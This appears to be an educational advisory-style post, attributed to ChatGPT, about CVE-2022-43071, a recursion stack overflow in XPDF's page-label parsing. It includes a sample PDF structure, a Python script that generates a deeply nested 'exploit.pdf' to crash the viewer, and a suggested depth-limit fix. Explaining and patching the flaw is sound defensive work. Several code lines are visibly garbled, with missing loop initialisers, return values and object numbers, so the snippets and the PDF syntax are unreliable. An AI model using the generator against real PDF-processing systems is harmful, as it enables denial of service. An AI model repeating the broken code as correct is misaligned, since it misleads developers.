CVE-2022-43071 - Stack Overflow in XPDF’s Catalog::readPageLabelTree2 – How a Single PDF Can Crash XPDF v4.04
XPDF is a popular, open-source PDF viewer and associated toolset, often used on Linux and embedded systems. In November 2022, a high-impact vulnerability, CVE-2022-43071, was found. It’s a stack overflow triggered in the Catalog::readPageLabelTree2(Object*) function of XPDF v4.04. Simply put, a smartly-crafted PDF file can crash the program, causing a Denial of Service (DoS). This post will break down what happened, show you what the vulnerable code looks like, and explain how attackers can craft such malicious PDFs.
What’s Going On? The Vulnerability Explained
First, let’s step back: a stack overflow happens when a program writes more data to the stack than it can handle, often via deep or infinite recursion. In this case, XPDF uses a recursive function to read page labels in PDFs. Bad actors realized they could craft a PDF that causes this function to call itself thousands of times, overflowing the stack, and crashing the viewer.
Vulnerable Code Snippet
// Simplified pseudo-reconstruction
int Catalog::readPageLabelTree2(Object* obj) {
    if (!obj->isDict()) return -1;
    Object kids = obj->dictLookup("Kids");
    if (kids.isArray()) {
        for (int i = ; i < kids.arrayGetLength(); ++i) {
            Object kid = kids.arrayGet(i);
            // >>> Vulnerable recursive call
            readPageLabelTree2(&kid);
        }
    }
    // ... other label logic ...
    return ;
}
There’s no check on recursion depth. If an attacker builds a PDF where the /Kids tree is very deep, this function will keep calling itself until there’s no more stack left.
How Can Attackers Exploit This?
All they need is to create a malicious PDF with a “kids” array that keeps nesting. Here’s a cut-down, minimal example showing what the structure might look like:
%PDF-1.4
1  obj
<<
  /Type /Catalog
  /PageLabels 2  R
>>
endobj
2  obj
<<
  /Kids [3  R]
>>
endobj
3  obj
<<
  /Kids [4  R]
>>
endobj
4  obj
<<
  /Kids [ ... repeats ... ]
>>
endobj
In a real-world exploit, this can go thousands of levels deep, causing a stack overflow in XPDF when it tries to parse this PDF.
This can trigger denial of service in automated systems (think: print servers or scanners).
- It could also be a stepping-stone for more severe exploits, though so far it’s been used for denial-of-service.
Below is a Python snippet to generate a deeply nested PDF label tree, as outlined above
with open("exploit.pdf", "w") as f:
    f.write("%PDF-1.4\n")
    f.write("1  obj\n<< /Type /Catalog /PageLabels 2  R >>\nendobj\n")
    n = 10000  # Recursion depth; adjust if needed
    for i in range(2, n+2):
        f.write(f"{i}  obj\n<< /Kids [{i+1}  R] >>\nendobj\n")
    f.write(f"{n+2}  obj\n<< >>\nendobj\n")
    f.write("trailer\n<< /Root 1  R >>\n%%EOF\n")
More Resources and References
- XPDF Official
- CVE-2022-43071 at NVD
- OSS-Security Mailing List post
- GitHub Issue Reference _(Poppler is based on XPDF code)_
How to Fix
If you use XPDF anywhere, upgrade to the latest version. Check the upstream patches, or set up file validation to reject suspiciously nested PDFs.
Alternatively, add a recursion depth limit to readPageLabelTree2, like so
int readPageLabelTree2(Object* obj, int depth = ) {
    if (depth > 100) return -1; // Prevent stack overflow
    // ... rest of the function ...
    readPageLabelTree2(&kid, depth + 1);
}
Summary
CVE-2022-43071 shows how even a single deeply-nested field in a file can crash a years-old library. Whenever your software parses complex files from outside, put safety checks on recursion!
Stay safe—always keep your dependencies updated, and don’t open PDFs from strangers with older software!
--  
*Exclusive write-up by ChatGPT, using public disclosures and code analysis for educational purposes.*
Timeline
Published on: 11/15/2022 17:15:00 UTC
Last modified on: 11/22/2022 13:44:00 UTC